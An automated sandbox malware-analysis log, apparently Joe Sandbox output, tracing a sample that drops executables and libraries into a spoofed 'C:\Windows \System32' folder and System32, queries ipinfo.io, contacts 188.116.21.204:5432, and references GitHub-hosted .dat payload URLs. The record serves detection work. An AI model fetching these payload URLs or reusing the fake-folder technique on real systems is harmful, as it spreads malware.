Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3450709409.00007FFD93F8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: ucrtbased.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA20144 FindClose,FindFirstFileExW,GetLastError,45_2_00007FF71FA20144
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA33764 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_00007FF71FA33764
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA201B8 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,45_2_00007FF71FA201B8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCCD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,76_2_00007FF60CCCD568
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EFD568 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,83_2_00007FF7D6EFD568
Source: global trafficTCP traffic: 192.168.2.6:49844 -> 188.116.21.204:5432
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
Source: unknownDNS query: name: ipinfo.io
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3641C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark,42_2_00007FFDA3641C20
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: global trafficDNS traffic detected: DNS query: runvrs.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: svchost.exe, 00000013.00000002.3450915324.000001F6D3611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000013.00000003.2384375707.000001F6D3370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3447936117.0000000064953000.00000008.00000001.01000000.00000012.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: svchost.exe, 00000013.00000002.3449448298.000001F6CDEB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
Source: console_zero.exe, 0000002D.00000002.2563177329.000001D7ED32C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, console_zero.exe, 0000002D.00000000.2532139890.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000002D.00000002.2563922460.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448830797.00000000682A4000.00000008.00000001.01000000.00000011.sdmpString found in binary or memory: http://www.gnu.org/licenses/
Source: svchost.exeString found in binary or memory: http://www.zlib.net/
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452208317.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564413372.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://www.zlib.net/D
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/V
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: svchost.exe, console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: svchost.exe, 00000013.00000003.2384375707.000001F6D33CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000013.00000003.2384375707.000001F6D3370000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: svchost.exe, 0000002A.00000002.3449969880.00000266EA90F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat
Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat
Source: svchost.exe, 0000002A.00000002.3450200488.00000266EA924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.dat
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://ipinfo.io/json
Source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.gnu.org/licenses/
Source: svchost.exeString found in binary or memory: https://www.openssl.org/
Source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000002A.00000002.3450978095.00007FFD9408E000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49860 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49872 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.6:49881 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49886 version: TLS 1.2
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3741180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,45_2_00007FFDA3741180
Source: cmd.exeProcess created: 48
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36F59C0: GetFileAttributesA,GetLastError,_errno,CreateFileA,GetLastError,DeviceIoControl,_errno,GetLastError,FormatMessageA,libintl_gettext,__acrt_iob_func,LocalFree,CloseHandle,_errno,CloseHandle,WideCharToMultiByte,_errno,isalpha,memcpy,42_2_00007FFDA36F59C0
Source: C:\Users\user\Desktop\pyld611114.exeFile created: C:\Windows\System32\usvcinsta64.exeJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exeJump to behavior
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dllJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\WindowsJump to behavior
Source: C:\Windows\System32\cmd.exeFile created: C:\Windows \System32Jump to behavior
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\winsvcf\winlogsvc
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x816796.dat
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile created: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\svchost.exeFile deleted: C:\Windows\System32\crypti.exe
Source: C:\Windows \System32\printui.exeCode function: 27_2_00007FF63F4210E027_2_00007FF63F4210E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600A23042_2_6600A230
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6601076042_2_66010760
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600981042_2_66009810
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600BC9042_2_6600BC90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_660050A042_2_660050A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_66019CB042_2_66019CB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600ACD042_2_6600ACD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_66004CE042_2_66004CE0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600DD2042_2_6600DD20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600CD6042_2_6600CD60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600E58042_2_6600E580
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6600D5A042_2_6600D5A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_660121B042_2_660121B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6828A0B042_2_6828A0B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6828C22042_2_6828C220
Source: C:\Windows\System32\svchost.exeCode function: 42_2_68281C1042_2_68281C10
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6828350042_2_68283500
Source: C:\Windows\System32\svchost.exeCode function: 42_2_682926C142_2_682926C1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD947471F042_2_00007FFD947471F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD9469BCB942_2_00007FFD9469BCB9
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD94694CAC42_2_00007FFD94694CAC
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD946928F042_2_00007FFD946928F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD9469AD4042_2_00007FFD9469AD40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD94746C9842_2_00007FFD94746C98
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD9469B4F042_2_00007FFD9469B4F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD947121A042_2_00007FFD947121A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD9469E35042_2_00007FFD9469E350
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD9473668842_2_00007FFD94736688
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD94693B2042_2_00007FFD94693B20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD946943D142_2_00007FFD946943D1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3610EB042_2_00007FFDA3610EB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368C28042_2_00007FFDA368C280
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364835042_2_00007FFDA3648350
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36222E042_2_00007FFDA36222E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366A2E042_2_00007FFDA366A2E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA363C24042_2_00007FFDA363C240
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364C21042_2_00007FFDA364C210
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360221042_2_00007FFDA3602210
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365E0F042_2_00007FFDA365E0F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366A6B042_2_00007FFDA366A6B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364C70042_2_00007FFDA364C700
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366059042_2_00007FFDA3660590
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C61042_2_00007FFDA361C610
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367055042_2_00007FFDA3670550
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366E4E042_2_00007FFDA366E4E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3658B6042_2_00007FFDA3658B60
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362CA9042_2_00007FFDA362CA90
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366CB3042_2_00007FFDA366CB30
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36869E042_2_00007FFDA36869E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3662FA042_2_00007FFDA3662FA0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364EDC042_2_00007FFDA364EDC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3664CD042_2_00007FFDA3664CD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3674CC042_2_00007FFDA3674CC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360538042_2_00007FFDA3605380
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364F42042_2_00007FFDA364F420
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360740042_2_00007FFDA3607400
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36232C042_2_00007FFDA36232C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36892A042_2_00007FFDA36892A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365D26042_2_00007FFDA365D260
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA366131042_2_00007FFDA3661310
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36770A042_2_00007FFDA36770A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365F0F042_2_00007FFDA365F0F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361B83042_2_00007FFDA361B830
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36656E042_2_00007FFDA36656E0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36634C042_2_00007FFDA36634C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA360FBB042_2_00007FFDA360FBB0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3603C4042_2_00007FFDA3603C40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3689C4042_2_00007FFDA3689C40
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3665C2042_2_00007FFDA3665C20
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA365DAD042_2_00007FFDA365DAD0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36738C042_2_00007FFDA36738C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA367985F42_2_00007FFDA367985F
